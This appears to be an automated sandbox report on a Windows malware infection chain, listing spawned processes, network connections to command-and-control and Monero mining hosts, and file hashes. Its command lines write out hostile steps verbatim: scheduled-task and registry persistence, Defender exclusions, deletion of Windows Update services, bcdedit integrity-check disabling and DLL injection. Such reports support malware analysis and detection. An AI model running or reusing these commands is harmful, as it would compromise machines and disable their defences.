PID 1372 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 1372 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 1372 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 1372 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 1372 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 1372 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\system32\taskkill.exe
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 1936 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 1936 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 1936 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 1936 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fileexe.exe

"C:\Users\Admin\AppData\Local\Temp\fileexe.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\system32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe" & exit

C:\Windows\system32\taskeng.exe

taskeng.exe {DBA3525A-2854-4155-B645-64AF8AD39A59} S-1-5-21-3297628651-743815474-1126733160-1000:HHVWDVKF\Admin:Interactive:[1]

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230625102804.log C:\Windows\Logs\CBS\CbsPersist_20230625102804.cab

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {3BF390EF-F9A6-47F6-BF6F-899DFB29A1F7} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-321029132353567927-1538182917666872451-14218077525795414386214723311889002673"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 81a8c24e-dfe0-40f3-a0d3-95dbdd686079.uuid.duniadekho.bar udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 server7.duniadekho.bar udp
BG 185.82.216.50:443 server7.duniadekho.bar tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 stun.ipfire.org udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 luckytradeone.com udp
US 172.67.181.198:443 luckytradeone.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.55.162:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 stun1.l.google.com udp
IN 172.253.121.127:19302 stun1.l.google.com udp

Files

memory/1332-54-0x0000000000B70000-0x0000000000FCA000-memory.dmp

\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 bd14e0f9b9cef063a9a20e81162ea47c
SHA1 d0b09c991d4092b596da762d5fc7dc2eac1057a7
SHA256 011fa85ec8a678389fa5251cba5e4b3b478907dbccb87e8c2bdf3179370e4293
SHA512 4c9c1f138fb7f15b1e2731134de6f624ce45874216b6de2e370ef8c8ba0cd184c3dafa2e429972a96fd33dfd6fff6bb261cbb5e13a8d91fd02dbd537e6643fad

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 bd14e0f9b9cef063a9a20e81162ea47c
SHA1 d0b09c991d4092b596da762d5fc7dc2eac1057a7
SHA256 011fa85ec8a678389fa5251cba5e4b3b478907dbccb87e8c2bdf3179370e4293
SHA512 4c9c1f138fb7f15b1e2731134de6f624ce45874216b6de2e370ef8c8ba0cd184c3dafa2e429972a96fd33dfd6fff6bb261cbb5e13a8d91fd02dbd537e6643fad

\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/1372-83-0x0000000002E00000-0x0000000002F70000-memory.dmp

memory/1372-84-0x0000000002F70000-0x00000000030A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

memory/1868-96-0x000000013FAD0000-0x000000013FE8D000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
